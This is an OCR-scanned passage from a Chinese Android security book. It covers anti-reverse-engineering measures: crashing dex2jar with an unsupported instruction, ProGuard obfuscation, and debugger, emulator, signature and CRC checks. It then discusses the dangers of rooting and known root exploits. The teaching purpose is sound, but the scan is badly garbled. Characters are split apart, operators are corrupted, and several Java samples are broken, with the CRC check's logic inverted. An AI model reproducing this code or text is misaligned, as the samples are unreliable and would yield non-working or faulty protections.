析 等 ， 但 通常 情况 下 ， 反 编译 工具 在 发 布 前 都 经 过 多 次 测试 ， 要 想 找 出 代 
码 的 缺陷 非常 困难 ， 并 且 分 析 此 类 软件 的 代码 ， 本 身 就 需要 分 析 人 员 具 有 
较 强 的 代码 阅读 与 理解 能 力 ， 因 此 ， 这 种 方法 具体 实施 起 来 比较 困难 。 

2. 压力 测试 

比 起 阅读 反 汇 编 工 具 的 源码 ， 这 种 方法 的 思路 就 显得 简单 多 了 ， 而 且 
实施 起 来 也 非常 的 容易 。 通 常 的 做 法 是 : 收集 大 量 的 apk 文 件 (数量 可 以 是 
成 百 上 千 ) 存放 进 一 个 目录 ， 编 写 脚本 或 程序 调用 反 编 译 工 具 对 目录 下 的 
所 有 apk 文 件 进 行 反 编 译 。 不 同 的 软件 从 大 小 、 内 容 到 结构 组 织 都 不 尽 相 
同 ， 反 编译 工具 在 处 理 它 们 时 有 可 能 会 出 现 异 常 。 这 很 好 理解 ， 反 编译 工 
具 也 是 人 写 的 ， 既 然 是 人 写 的 ， 在 处 理 apk 文 件 时 ， 就 有 可 能 出 现 考虑 不 当 
或 处 理 错 误 的 时 候 ， 我 们 可 以 从 反 编译 时 的 出 错 信息 中 ， 查 找 反 编译 工具 
的 缺陷 ， 然 后 在 软件 中 加 以 利用 。 


10.1.2 ”对 抗 dex2jar 


大 多 数 分 析 Android 程 序 的 人 不 喜欢 阅读 smali 反 汇编 代码 ， 因 为 它们 语 
法 怪异 、 星 涩 难 懂 、 框 架 混 乱 ， 相 比 之 下 ， 使 用 dex2jar 将 dex 文 件 转 换 为 jar 
后 ， 通 过 jd-gui 查 看 其 Java 代 码 可 以 获得 更 好 的 反 汇编 体验 。 因 此 ，dex2jar 
应 该 是 最 有 必要 对 抗 的 反 汇 编 工具 之 一 ， 笔 者 决定 对 它 进行 一 次 压力 测 
试 。 


笔者 测试 的 dex2jar 版 本 为 0.0.7.8， 在 测试 样本 的 文件 夹 中 编写 一 段 脚本 
程序 自动 调用 dex2jar。 笔 者 使 用 了 Windows 的 批 处 理 ， 编 写 的 代码 如 下 : 
for $$i in (*.apk) do dex2jar $$i 


将 这 行 代码 保存 为 bat 文 件 后 ， 打 开 命 令 提示 符 ， 然 后 运行 脚本 ， 最 终 
在 反 编译 一 个 样本 时 出 现 了 错误 ， 输 出 的 错误 信息 如 下 (样本 程序 的 名 称 
笔者 已 经 隐 去 ) : 


version:0.0.7.8-SNAPSHOT 
3 [main] INFO pxb.android.dex2jar.v3.Main - dex2jar xxx.apk -> xxx.apk. 
dex2jar.jar 
1671 [main] ERROR pxb.android.dex2jar.reader.DexFileReader - Fail on class 
java.lang.RuntimeException: Error in method: [Lsun/security/util/BitArray;. 
position(I)I] 
at pxb.android.dex2jar.reader.DexFileReader.visitMethod(DexFileReader. 
java:499) 
at pxb.android.dex2jar.reader.DexFileReader.acceptClass (DexFileReader. 
java:302) 
at pxb.android.dex2jar.reader.DexFileReader.accept (DexFileReader.java:177) 
at pxb.android.dex2jar.v3.Main.doData (Main.java:78) 
at pxb.android.dex2jar.v3.Main.doFile(Main.java:120) 
at pxb.android.dex2jar.v3.Main.main(Main.java:64) 
Caused by: java.lang.RuntimeException: Not support Opcode:[0x00d9]-2RSUB INT 
.LIT8 yet! 
at pxb.android.dex2jar.v3.V3CodeAdapter.visitInInsn(V3CodeAdapter. 
java:824) 
at pxb.android.dex2jar.reader.DexOpcodeAdapter.visit (DexOpcodeAdapter. 
java:321) 
at pxb.android.dex2jar.reader.DexCodeReader.accept (DexCodeReader. 
java:314) 
at pxb.android.dex2jar.reader.DexFileReader.visitMethod(DexFileReader. 
java:497) 
...5 more 


使 用 jd-gui 打 开 生 成 的 jar 文 件 ， 也 无 法 查看 到 该 文件 的 Java 代 码 ， 看 来 
dex2jar 在 处 理 这 个 apk 文 件 时 存在 缺陷 。 从 错误 的 提示 来 看 ， 应 该 是 dex2jar 
在 解析 dex 文 件 时 遇 到 了 不 支持 的 Dalvik 指 令 RSUB_INT_LIT8， 错 误 的 信息 
中 同时 打印 出 了 dex2jar 相 应 的 源码 位 置 ， 位 于 DexFileReader.java 文 件 的 第 
499 行 。RSUB_INT_LIT8 指 令 的 作用 是 逆 减 法 操作 ( 即 第 2 个 操作 数 减 去 第 1 


个 操作 数 ) ， 既 然 dex2jar 遇 到 该 指令 时 会 发 生 异 常 ， 我 们 只 需 在 编写 软件 
时 让 代码 生成 该 指令 即 可 。 

从 错误 信息 中 可 以 看 出 ， 发 生 异 常 的 代码 为 sun.security.util.BitArray 类 
的 position() 方 法 ， 这 个 类 是 jdk 提 供 的 ， 我 们 直接 查看 BitArray 的 源码 ， 代 码 
如 下 : 


public class BitArray { 


private static int position(int idx) { // bits big-endian in each unit 
return 1 «« (BITS PER UNIT - 1 - (idx $ BITS PER UNIT)); 
) 

j 


这 个 position() 方 法 的 代码 非常 简单 ， 将 它 的 代码 加 入 到 我 们 的 软件 
中 ， 是 否 就 可 以 让 dex2jar 反 编译 出 错 呢 ? 经 过 笔者 的 实验 ， 发 现 的 确 如 
此 ， 具 体 的 代码 读者 可 以 参看 本 小 节 实 例 Antidex2jar 工 程 。 


10.2 “对抗 静 态 分 析 


不 要 指望 反 编 译 工具 永远 无 法 编译 你 的 软件 ， 上 一 节 介 绍 的 方法 只 对 
dex2jar-0.0.7.8 版 本 有 效 ， 最 新 版 本 的 dex2jar 已 经 能 够 很 好 的 处 理 
RSUB_INT_LIT8 指 令 了 。 因 此 ， 我 们 需要 想 其 他 办 法 来 防止 软件 遭 到 破 


解 。 
10.2.1 ”代码 混淆 技术 


使 用 Native 代 码 代替 Java 代 码 是 很 好 的 代码 保护 手段 ， 因 为 大 部 分 人 还 
不 具备 自由 分 析 Native 代 码 的 能 力 。 但 如 果 您 是 一 个 纯 Java 的 程序 员 ， 不 具 
备 C/C++ 编 程 基础 ， 就 只 能 考虑 使 用 代码 混 奖 技术 了 。Java 语 言 编写 的 代码 
本 身 就 很 容易 被 反 编译 ，Google 很 早 就 意识 到 了 这 一 点 ， 在 Android 2.3 的 
SDK 中 正式 加 入 了 ProGuard 代 码 混 消 工 具 ， 开 发 人 员 可 以 使 用 该 工具 对 自 
己 的 代码 进行 混淆 。 


ProGuard 提 供 了 压缩 (Shrinking) . Æ (Obfuscation) 、 优 化 
(Optimition) Java 代 码 以 及 反 混 消 栈 跟踪 (ReTrace) 的 功能 。 使 用 
ProGuard 前 需要 编写 混淆 配置 文件 ， 使 用 Eclipse+ADT 开 发 Android 应 用 程 
序 ， 会 默认 生成 Des properties 与 proguard.cfg 两 个 文件 ， 要 想 使 用 
ProGuard;& 78 4A ft , 手动 的 配置 它们 ， 首 先 需要 在 project.properties 文 
件 中 如 下 添加 一 Gig, 


proguard.config-proguard.cfg 
接着 在 proguard.cfg 文 件 中 设置 需要 混 消 与 保留 的 类 或 方法 。 一 个 典型 
的 配置 文件 内 容 如 下 : 


-optimizations !code/simplification/arithmetic, !code/simplification/cast, 
!field/*,!class/merging/* 

-optimizationpasses 5 

-allowaccessmodification 


-dontpreverify 


# The remainder of this file is identical to the non-optimized version 
# of the Proguard configuration file (except that the other file has 


# flags to turn off optimization). 


-dontusemixedcaseclassnames 
-dontskipnonpubliclibraryclasses 


-verbose 


-keepattributes *Annotation* 
-keep public class com.google.vending.licensing.ILicensingService 


-keep public class com.android.vending.licensing.ILicensingService 


# For native methods, see 
http://proguard.sourceforge.net/manual/examples.htmlé&native 
-keepclasseswithmembernames class * ( 


native «methods»; 


# keep setters in Views so that animations can still work. 
# see http://proguard.sourceforge.net/manual/examples.htmls$beans 


-keepclassmembers public class * extends android.view.View ( 
void set*(***),; 


*ckok get*(); 


# We want to keep methods in Activity that could be used in the XML attribute 
onClick 
-keepclassmembers class * extends android.app.Activity { 


public void *(android.view.View); 


# For enumeration classes, see 
http://proguard.sourceforge.net/manual/examples.htmlé&enumerations 
-keepclassmembers enum * ( 

public static **[] values(); 

public static ** valueOf(java.lang.String); 


-keep class * implements android.os.Parcelable ( 


public static final android.os.ParcelableS$Creator *; 


-keepclassmembers class **.R$* ( 
public static «fields»; 


# The support library contains references to newer platform versions. 
# Don't warn about those in case this app is linking against an older 
# platform version. We know about them, and they are safe. 


-dontwarn android.support.** 


ProGuard 默 认 情况 下 会 对 class 文 件 中 所 有 的 类 、 方 法 以 及 字段 进行 混 
消 ， 经 过 混 消 的 类 已 经 “ 面 无 全 非 ” 了 ， 这 种 情况 通常 会 造成 Android 程 序 运 
行 时 找 不 到 特定 的 类 而 抛 出 异常 ， 解 决 的 方法 是 根据 异常 信息 的 内 容 ， 找 
到 出 现 异 常 的 类 ， 然 后 在 配置 文件 中 使 用 “-keep UE DN 
ProGuard 具 体 的 配置 方法 笔者 就 不 介绍 了 ， 网 上 有 很 多 文章 对 其 介绍 的 很 
详细 。 如 图 10-1 所 示 ， 经 过 混淆 过 的 代码 a 
代码 ， 本 书 将 在 第 12 章 详细 分 析 它 ) ， 使 用 jd-gui 分 析 起 来 同样 会 非常 吃 
力 。 
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图 10-1 使 用 jd-gui 阅 读 混淆 过 的 代码 
10.2.2 ”NDK 保 护 


如 果 读 者 熟悉 使 用 Android NDK 编 写 Native 代 码 ， 那 么 在 自己 的 项 目 中 
就 要 多 多 使 用 它 。 在 前 面 的 章节 中 ， 我 们 曾 多 次 介绍 过 Android NDK 编 写 的 
程序 ， 笔 者 甚至 花 了 两 章 的 内 容 来 讲解 如 何 逆 向 它们 。 相 信 读 者 对 其 中 的 
内 容 印 象 深刻 吧 。 逆 向 NDK 程 序 的 汇编 代码 本 身 就 是 一 件 极 其 枯燥 与 艰难 
的 事情 ， 能 坚持 下 来 的 人 少 之 又 少 ， 没 有 汇编 语言 基础 的 读者 则 更 是 极 易 
放弃 。 

如 何 强 而 有 效 地 使 用 Native 代 码 来 保护 自己 的 软件 ， 就 要 仁者 见 仁 ， 智 
者 见 智 了 。 软 件 的 保护 强度 一 方面 与 开发 人 员 的 C/C++ 编 程 水 平 有 关 ， 这 里 
的 编程 水 平 不 是 指 实现 软件 功能 的 能 力 ， 而 是 指 开 发 人 员 自 身 对 软件 安全 
的 了 解 ， 如 功能 字符 串 加 密 、 代 码 加 密 等 ， 对 于 从 事 过 Linux 平 台 商 业 软 件 
开发 的 作者 来 说 ， 编 写 Native 代 码 来 保护 自己 的 代码 应 该 不 是 很 难 的 事情 ， 


因为 Linux 上 那 套 API 在 NDK 中 可 以 原原本本 的 拿 来 使 用 ; 另 一 方面 ， 使 用 
Native 代 码 实现 软件 功能 有 点 舍 近 求 远 的 感觉 ， 往 往 几 行 Java 代 码 就 能 搞定 
的 事情 ， 使 用 Native 代 码 却 需要 几 十 行 甚至 更 多 的 代码 才能 实现 ， 这 让 很 多 
开发 人 员 感 到 纠结 ， 除 了 代码 量 的 增加 ， 还 有 调试 Native 代 码 的 难度 也 比 调 
试 Java 代 码 高 出 许多 ， 开 发 成 本 的 增加 势必 会 让 很 多 开发 人 员 难 以 接受 ， 
此 ， 在 代码 安全 与 开发 周期 上 还 需要 找到 一 个 平衡 点 。 

本 小 节 不 提供 实例 代码 讲解 ， 读 者 可 以 参考 本 书 9.6 小 节 重 启 验 证 的 例 
子 ， 在 它 的 基础 上 进行 功能 扩展 ， 实 现 更 多 保护 。 


10.2.3 “外壳 保护 


外 壳 保 护 是 一 种 代码 加 密 技 术 ， 在 Windows 平 台 的 软件 中 广泛 被 使 用 。 
外 壳 保 护 正 如 其 名 称 一 样 ， 给 软件 套 上 一 层 “ 外 壳 ”， 经 过 外 壳 保 护 的 软 
件 ， 展 现在 分 析 人 员 面 前 的 是 外 壳 的 代码 ， 因 此 ， 从 很 大 程序 上 保护 了 软 
件 被 人 破解 。 

Java 代 码 由 于 其 语言 自身 的 特殊 性 ， 没 有 外 壳 保 护 这 个 概念 ， 只 能 通过 
混淆 方式 对 其 进行 保护 。 外 壳 保 护 重 点 针对 使 用 Android NDK 编 写 的 Native 
代码 ， 逆 向 Native 代 码 本 身 就 已 经 够 困难 了 ， 如 果 添加 了 外 壳 保护 则 更 是 难 
上 加 难 ， 目 前 已 知 可 用 于 ARM Linux 内 核 程序 的 加 壳 工 具 只 有 upx， 它 是 一 
款 开源 的 加 壳 软 件 ， 支 持 多 平台 、 多 类 型 的 文件 加 壳 ， 其 主页 为 
http://upx.sourceforge.net/。 截 止 到 笔者 编写 完 本 章 时 ， 该 工具 最 新 版 本 为 
3.08， 支 持 的 最 高 ARM 指 令 集 版 本 为 4， 由 于 Android NDK 使 用 的 是 v5 与 
V7-a 版 本 的 指令 集 ， 因 此 ， 该 工具 目前 还 无 法 在 Android 系 统 中 正常 工作 ， 
笔者 相信 在 不 久 的 将 来 ， 它 一 定 能 应 用 到 Android 软 件 中 来 。 


10.3 “对抗 动态 调试 


如 果 您 认为 自己 编写 的 代码 已 经 足够 对 付 别人 静态 分 析 了 ， 可 以 考虑 
在 代码 中 加 入 动态 调试 检测 ， 让 破解 者 无 从 对 自己 的 软件 下 手 。 


10.3.1 检测 调试 器 


动态 调试 使 用 调试 器 来 挂钩 软件 ， 获 取 软 件 运 行 时 的 数据 ， 我 们 可 以 
在 软件 中 加 入 检测 调试 器 的 代码 ， 当 检测 到 软件 被 调试 器 连接 时 ， 中 止 软 
件 的 运行 。 

首先 T£ AndroidManifest.xml 文件 的 Application 标签 中 加 入 
android:debuggable="false" 让 程序 不 可 调试 ， 这 样 ， 如 果 别 人 想 调试 该 程序 
就 必然 会 修改 它 的 值 ， 我 们 在 代码 中 检查 它 的 值 来 判断 程序 是 否 被 修改 
过 ， 代 码 如 下 : 

if ((getApplicationInfo().flags &- 

Applicationinfo.FLAG DEBUGGABLE) !- 0){ 
Log.e("com.droider .antidebug"，" 程 序 被 修改 为 可 调试 状态 ")， 
android.os.Process.killProcess(android.os.Process.myPid()); 

j 


ApplicationInfo.FLAG DEBUGGABLE XJ I android:debuggable-"true" , 
如 果 该 标志 被 置 位 ， 说 明 程 序 已 经 被 修改 ， 这 个 时 候 就 可 以 果断 地 中 止 程 
序 运行 。 

另外 ，Android SDK 中 提供 了 一 个 方法 方便 程序 员 来 检测 调试 器 是 否 
经 连接 ， 代 码 如 下 : 

android.os.Debug.isDebuggerConnected() 

如 果 方 法 返回 真 ， 说 明 调 试 器 已 经 连接 。 我 们 可 以 随机 地 在 软件 中 插 
入 这 行 代码 来 检测 调试 器 ， 碰 到 有 调试 器 连接 就 果断 地 结束 程序 运行 。 

检测 调试 器 的 完整 代码 读者 可 以 参看 本 书 配 套 源 代码 中 本 小 节 的 
AntiDebug 工 程 。 


10.3.2 ”检测 模拟 器 


软件 发 布 后 会 安装 到 用 户 的 手机 中 运行 ， 如 果 发 现 软件 运行 在 模拟 器 
中 ， 很 显然 不 合 常理 ， 可 能 是 有 人 试图 破解 或 分 析 它 ， 这 种 情况 我 们 必须 
予以 阻止 。 


模拟 器 与 真实 的 Android 设 备 有 着 许多 差异 ， 我 们 可 以 在 命令 提示 符 下 
执行 “adb shell getprop” 查 看 并 对 比 它们 的 属性 值 ， 经 过 对 比 发 现 ， 有 如 下 几 
个 属性 值 可 以 用 来 判断 软件 是 否 运行 在 模拟 器 中 : 

ro.product.model: 该 值 在 模拟 器 中 为 sdk， 通 常 在 正常 手机 中 它 的 值 为 
手机 的 型 号 。 

ro.build.tags: 该 值 在 模拟 器 中 为 test-keys， 通 常 在 正常 手机 中 它 的 值 为 
release-keyso 

ro.kernel.qemu: 该 值 在 模拟 器 中 为 1， 通 常 在 正常 手机 中 没有 该 属性 。 

这 些 属性 的 差异 可 以 用 来 判断 软件 是 否 运 行 在 模拟 器 中 ， 笔 者 以 检查 
ro.kernel.qemu 属 性 为 例 ， 编 写 检 测 模拟 器 的 代码 如 下 : 


boolean isRunningInEmualtor() ( 


boolean qemuKernel - false; 


Process process - null; 


DataOutputStream os - null; 
try( 


process = Runtime.getRuntime().exec("getprop ro.kernel.qemu"); 
// 执 行 getprop 

os = new Data0utputStream(brocess .getoutputStream());// 获 取 输 出 流 
BufferedReader in = new BufferedReader( 


new InputStreamReader (process.getInputStream(), GBK")); 
os.writeBytes("exitWin"); /7 执行 退出 
os.flush(); // 刷 新 输出 流 
process.waitFor(); 
qemuKernel = (Integer.valueOf(in.readLine()) == 1); // 判 断 
ro.kernel .qemu 属 性 值 是 否 为 1 
Log.d("com.droider .checkqemu"，,，“" 检 测 到 模拟 器 :" + qemuKernel); 


} catch (Exception e)( 


qemuKernel = false; // 出 现 异 常 ， 可 能 是 在 手机 中 运行 


Log.d("com.droider.checkqemu", "run failed" + e.getMessage()); 
) finally ( 
try{ 
rE óS bzenuell s 
os.close(); 


) 


} 
process.destroy(); 
) catch (Exception e) ( 


) 


Log.d("com.droider.checkqemu", "run finally"); 


return qemuKernel; 


) 


检测 模拟 器 的 完整 代码 读者 可 以 参看 本 书 配套 源 代 码 中 本 小 节 的 
CheckQemu 工 程 。 


10.4 ”防止 重 编译 


反 破 解 的 最 后 一 个 环节 是 防止 重 编译 。 破 解 者 可 能 注入 代码 来 分 析 我 
们 的 软件 ， 也 可 能 修改 软件 逻辑 直接 破解 ， 不 管 怎么 修改 软件 本 身 的 一 
些 特 性 已 经 改变 了 


10.4.1 检查 签名 


一 个 软件 在 发 布 时 都 需要 开发 人 员 对 其 进行 签名 ， 而 签名 使 用 的 密 
Em uiia en 
钥 文件 被 盗 除外 ) ， 因 此 ， 签 名 成 了 Android 软 件 一 种 有 效 的 身份 标识 ， 如 
果 软 件 运行 时 的 签名 与 自己 发 布 时 的 不 同 ， 说 明 软 件 被 自 改 过， 这 个 时 候 
我 们 就 可 以 让 软件 中 止 运行 。 

Android SDK 中 提供 了 检测 软件 签名 的 方法 ， 可 以 调用 PackageManager 
类 的 getPackageInfo() 75 法， 为 第 2 个 参数 传 入 
PackageManager.GET_SIGNATURES， 返 回 的 PackageInfo 对 和 象 的 signatures 字 
段 就 是 软件 发 布 时 的 签名 ， 但 这 个 签名 的 内 容 比 较 长 ， 不 适合 在 代码 中 做 
比较 ， 可 以 使 用 签名 对 象 的 hashCode() 方 法 来 获取 一 个 Hash 值 ， 在 代码 中 比 
较 它 的 值 即 可 ， 获 取 签 名 Hash 值 的 代码 如 下 : 

public int getSignature(String packageName) { 

PackageManager pm - this.getPackageManager(); 

PackageInfo pi = null; 

int sig = 0; 

try ( 

pi = pm.getPackageInfo(packageName, PackageManager.GET SIGNATURES); 

Signature[] s = pi.signatures; 

sig - s[0].hashCode(); 

) catch (Exception el) { 

sJg-z'05; 

el.printStackTrace(); 

) 


return sig; 


) 
2E A ffe H Eclipse EJ rf B 38] ia hi 2 $8 X fF E BILE apk X fF BS Hash 8 7J 
2071749217， 在 软件 启动 时 ， 判 断 其 签名 Hash 是 否 为 这 个 值 ， 来 检查 软件 


是 否 被 自 改 过 ， 相 应 的 代码 如 下 : 


int sig = getSignature("com.droider.checksignature"); 
lf (sig !- 2071749217) ( 
text info.setTextColor(Color.RED); 
text_info.setText(" 检 测 到 程序 签名 不 一 致 ， 该 程序 被 重新 打包 过 ! ") ; 
) else ( 
text info.setTextColor(Color.GREEN); 
text_info .setText( "该 程序 没有 被 重新 打包 过 ! ") ; 


检查 签名 的 完整 代码 读者 可 以 参看 本 书 配 套 源 代码 中 本 小 节 的 
CheckSignature 工 程 。 


10.4.2” 校 验 保护 


重 编译 Android 软 件 的 实质 是 重新 编译 classes.dex 文 件 ， 代 码 经 过 重新 编 
译 后 ， 生 成 的 classes.dex 文 件 的 Hash 值 已 经 改变 。 我 们 可 以 检查 程序 安装 后 
classes.dex 文 件 的 Hash 值 ， 来 判断 软件 是 否 被 重 打 包 过 。 至 于 Hash 算 法 ， 
MD5 或 CRC 都 可 以 ，apk 文 件 本 身 是 zip 压 缩 包 ， 而 且 Android SDK 中 有 专门 
处 理 zip 讨 缩 包 及 获取 CRC 检 验 的 方法 ， 为 了 不 徒 增 代 码 量 ， 笔 者 采用 CRC 
作为 classes.dex 的 校 验算 法 。 另 外 ， 每 一 次 编译 代码 后 ， 软 件 的 CRC 都 会 改 
变 ， 因 为 ， 无 法 在 代码 中 保存 它 的 值 来 进行 判断 ， 文 件 的 CRC 校 验 值 可 以 
保存 到 Assert 目 录 下 的 文件 或 字符 串 资源 中 ， 也 可 以 保存 到 网 络 上 ， 和 软件 运 
行 时 再 联网 读 取 ， 笔 者 为 了 方便 ， 选 择 了 前 一 种 方法 ， 相 应 的 代码 如 下 : 


private boolean checkCRC() ( 


) 


boolean beModified - false; 

long crc = Long.parseLong(getString(R.string.crc)); 

ZipFile zf; 

try ( 
zf - new ZipFile(getApplicationContext().getPackageCodePath()); 
// 获 取 apk 安 装 后 的 路 径 


ZipEntry ze = zf.getEntry("classes.dex"); // 获 取 apk 文 件 中 的 classes .dex 
Log.d("com.droider.checkcrc", String.valueOf(ze.getCrc())); 
if (ze.getCrc() == crc) ( / /检查 CRC 


beModified = true; 
} 

} catch (IOException e) { 
e.printStackTrace(); 
beModified - false; 

) 

return beModified; 


检查 检验 值 的 完整 代码 读者 可 以 参看 本 书 配 套 源 代码 中 本 小 节 的 
CheckCRC 工 程 。 


10.5 


本 章 小 结 


本 章 介绍 了 一 些 常见 的 Android 软 件 防 破 解 方法 ， 将 这 些 方法 结合 起 来 
可 以 大 大 提高 软件 的 安全 性 ， 读 者 在 实际 编写 代码 的 过 程 中 应 多 多 使 用 。 
另外 ， 读 者 也 要 学 会 总 结 自己 的 经 验 ， 和 争取 寻找 出 更 为 有 效 的 保护 方法 。 


第 11 章 ”Android 系统 攻击 与 防范 


在 本 章 开 头 ， 笔 者 先 提出 一 个 问题 : 您 觉得 自己 的 手机 安全 吗 ? 

在 很 多 人 看 来 ， 这 可 能 是 个 很 简单 的 问题 ， 阅 读本 书 的 读者 大 多 数 都 
具备 Android 软 件 开 发 的 能 力 ， 了 解 Android 开 发 中 常用 的 组 件 ， 懂 得 如 何 让 
软件 拥有 更 好 的 用 户 体验 。 但 您 真 的 知道 Android 系 统 中 哪些 环节 容易 受到 
攻击 ， 哪 些 代码 容易 给 用 户 带 来 潜在 的 安全 隐患 吗 ? 


11.1 Android 系 统 安 全 概述 


Android 系 统 安 全 的 话题 比较 大 ， 它 涉及 到 不 同 的 安全 环节 。 首 先是 用 
户 环节 ， 这 个 环节 永远 是 最 薄弱 的 ， 你 永远 不 能 指望 用 户 中 规 中 和 矩 地 使 用 
手机 ， 对 于 国内 大 多 数 Android 手 机 用 户 来 说 ，ROOT 手 机 几乎 快 成 了 使 用 
手机 过 程 中 必须 要 做 的 事情 ， 然 而 又 有 多 少 人 知道 ， 手 机 ROOT 后 会 带 来 多 
大 的 安全 隐患 。 本 章 将 在 11.2 节 讨论 手机 ROOT 所 带 来 的 安全 隐患 ， 以 及 手 
机 ROOT 的 原理 。 

除了 手机 的 使 用 者 外 ， 软 件 开 发 人 员 自 身 也 可 能 是 Android 系 统 受到 攻 
击 的 “罪魁 祸首 ”， 看 到 这 段 话 ， 可 能 有 许多 读者 要 跟 我 急 了 : 我 们 是 软件 
的 创造 者 ， 创 造 了 无 数 个 实用 的 软件 ， 伴 随 用 户 度 过 了 许多 美好 的 时 光 ， 
我 们 是 Android 世 界 里 最 可 爱 的 人 。 笔 者 不 得 不 承认 这 是 多 么 真诚 的 呼声 ， 
也 不 能 不 肯定 他 们 为 软件 行业 做 出 的 巨大 贡献 ， 笔 者 自己 也 是 从 事 Android 
软件 开发 这 个 行业 ， 这 其 中 的 体会 自然 也 是 非常 深刻 的 。 但 事实 情况 就 是 
这 样 ， 系 统 安全 问题 很 多 情况 下 是 由 第 三 方 软件 引起 的 ， 比 如 下 面 将 要 介 
绍 的 Android 组 件 安全 、 数 据 安 全 ， 希 望 读者 在 看 完 相 应 的 小 节 后 ， 还 能 够 
大 声 地 说 :我 的 软件 是 安全 的 。 

最 后 要 讲 的 是 手机 的 ROM 安 全 了 ， 这 是 一 个 普遍 存在 而 无 人 谈 及 的 话 
题 。 现 在 是 时 候 将 它 拿 出 来 说 一 说 了 。 


11.2 “手机 ROOT 带 来 的 危害 


手机 ROOT 是 指 让 手机 在 使 用 过 程 中 能 够 获取 root 权 限 ， 即 最 高 管理 员 
权限 。 很 多 人 将 手机 ROOT 说 成 ROOT 手机 、 手 机 rooting 或 手机 破解 ， 其 含 
义 是 一 样 的 。 


11.2.1 ”为 什么 要 ROOT 手机 


通常 ， 厂 商 出 于 手机 安全 考虑 ， 和 生产 出 的 手机 在 出 厂 后 都 是 不 具备 root 
权限 的 ， 这 样 用 户 在 使 用 时 就 会 有 诸多 限制 。 比 如 ， 手 机 出 广 时 捆绑 的 软 
件 ， 这 些 软件 不 仅 占用 手机 存储 空间 ， 而 且 由 于 它们 是 系统 软件 ， 所 以 无 
法 删除 ， 要 想 保 留 一 个 “干净 ”的 系统 ， 只 能 ROOT 手机 。 其 次 ， 手 机 无 法 获 
取 root 权 限 ， 也 就 意味 着 软件 中 需要 使 用 到 root 权 限 的 操作 都 将 失效 ， 一 些 
特殊 功能 的 软件 就 无 法 使 用 ， 这 对 于 部 分 用 户 来 说 ， 是 非常 恼火 的 ， 为 了 
能 够 使 用 这 部 分 软件 ， 只 能 选择 ROOT 自己 的 手机 。 最 后 一 类 ROOT 手机 的 
人 应 该 属于 手机 发 烧 友 了 ， 他 们 为 了 追求 更 高 的 手机 性 能 、 个 性 化 的 手机 
系统 ， 自 己 动手 修改 手机 系统 ， 然 而 所 有 这 些 对 系统 的 操作 都 需要 有 root 权 
限 ， 因 此 ，ROOT 手 机 对 他 们 来 说 就 是 必须 要 做 的 事情 了 。 


11.2.2 ”手机 ROOT 后 带 来 的 安全 隐患 


手机 ROOT 后 的 确 方便 了 用 户 ， 但 同时 也 带 来 了 许多 安全 隐患 ， 笔 者 总 
结 了 一 下 ， 有 如 下 几 点 : 

1。 系 统 不 稳定 

很 多 用 户 在 ROOT 手机 后 ， 为 了 让 手机 运行 的 更 加 流畅 ， 会 对 系统 中 的 
软件 进行 精 减 。 这 个 过 程 中 就 有 可 能 误 删 系统 重要 文件 ， 导 致 系统 运行 不 
稳定 或 损坏 。 为 了 规避 因为 ROOT 手机 而 造成 的 系统 损坏 ， 手 机 广 商 们 现在 
都 已 经 明确 规定 了 : 手机 ROOT 后 将 失去 保修 ! 因此 ， 用 户 在 ROOT 手机 前 
需要 考虑 清楚 ， 是 否 真 的 需要 ROOT 手机 ? 


2. 病毒 侵入 

手机 ROOT 后 所 有 软件 都 能 够 获得 root 权 限 ， 这 无 疑 给 手机 病毒 带 来 了 
更 多 “发 展 "空间 。 没 有 root 权 限 的 手机 ， 用 户 可 以 检查 软件 使 用 的 权限 来 判 
断 是 否 有 恶意 行为 ， 一 旦 手机 ROOT 后 ， 亚 意 软 件 将 不 会 直接 申请 需要 使 用 
的 权限 ， 所 有 特定 的 功能 病毒 都 可 以 在 root 权 限 下 完成 。 虽 然 有 权限 管理 软 
件 控制 软件 获取 root 权 限 ， 但 用 户 通 常 无 法 得 知 软件 使 用 root 权 限 的 用 途 ， 
一 般 情况 下 都 会 选择 放行 ， 这 样 权 限 管理 软件 就 形同虚设 了 。 

3. 隐私 数据 暴露 

有 Android 软 件 开发 经 验 的 读者 都 知道 ，Android 软 件 在 安装 后 都 有 一 个 
属于 自己 的 程序 目录 ， 软 件 中 的 所 有 私有 数据 都 存放 在 这 个 目录 下 ， 用 户 
与 其 它 软 件 都 没有 访问 权限 。 一 旦 手机 ROOT 后 ， 这 些 数 据 就 全 部 暴露 出 来 
了 ， 例 如 IM 类 软件 的 聊天 记录 、 网 银 账 号 名 与 密码 ， 这 些 数据 都 是 用 户 的 
个 人 隐私 ， 如 果 泄 露 可 能 面临 巨大 的 经 济 损失 ， 甚 至 对 个 人 形象 造成 不 及 
的 影响 。 


11.2.3 ” Android 手机 ROOT 原理 


手机 ROOT 是 通过 已 经 公布 的 Android 系 统 本 地 提 权 漏洞 ， 借 助 漏洞 利 
用 程序 来 提升 系统 的 用 户 权 限 。 手 机 ROOT 分 为 临时 ROOT 与 永久 ROOT， 
临时 ROOT 是 指 临时 性 的 获取 系统 root 权 限 ， 不 对 系统 进行 任何 修改 ， 而 永 
久 ROOT 是 指 修 改 Android 系 统 ， 手 机 可 以 随时 的 获取 root 权 限 。 

截止 到 笔者 编写 完 本 章 时 ，Android 系 统 的 本 地 提 权 漏洞 一 共 出 现 过 8 
个 。 读 者 可 以 下 载 X-ray for Android 程 序 来 检测 自己 的 手机 是 否 可 以 通过 这 8 
个 漏洞 来 获取 root 权 限 ，X-ray for Android 可 以 使 用 手机 访问 
http://www.xray.io/dl 进行 下 载 。 在 笔者 的 Moto XT615 上 面 运 行 X-ray for 
Android， 其 扫描 结果 如 图 11-1 所 示 ， 只 有 Gingerbreak 漏 洞 可 以 提 权 。 


Vulnerable 


Gingerbreak 


Last analyzed 10H 12th, 2012 


Not Vulnerable 


Wunderbar 


Last analyzed 8H 24th, 2012 


Exploid 


Last analyzed 8H 


ASHMEM 


Last analyzed 8H 23rd, 2012 


ZergRush 


Last analyzed 8H 24th, 2012 


Zimperlich 


Last analyzed 8 H 23rd, 2012 


图 11-1 X-ray for Android 扫 描 结果 


市 场 上 的 手机 一 键 ROOT 工具 都 是 基于 这 些 漏 洞 来 获取 root 权 限 的 ， 当 
选择 永久 ROOT 后 ，ROOT 工 具 就 会 向 手机 系统 的 /sysrem/app 目 录 写 入 root 
权限 管理 软件 (通常 是 Superuser.apk) ， 以 及 向 /system/bin 或 /system/xbin 目 
录 写 入 su 程序 。 下 面 我 们 来 看 看 ，su 与 Superuser.apk 是 如 何 协 作 ， 对 系统 进 
行 root 权 限 管理 的 。 


目 前 su 与 Superuserapk 是 由 ChainsDD 维护 的 ， 其 项 目地 址 为 
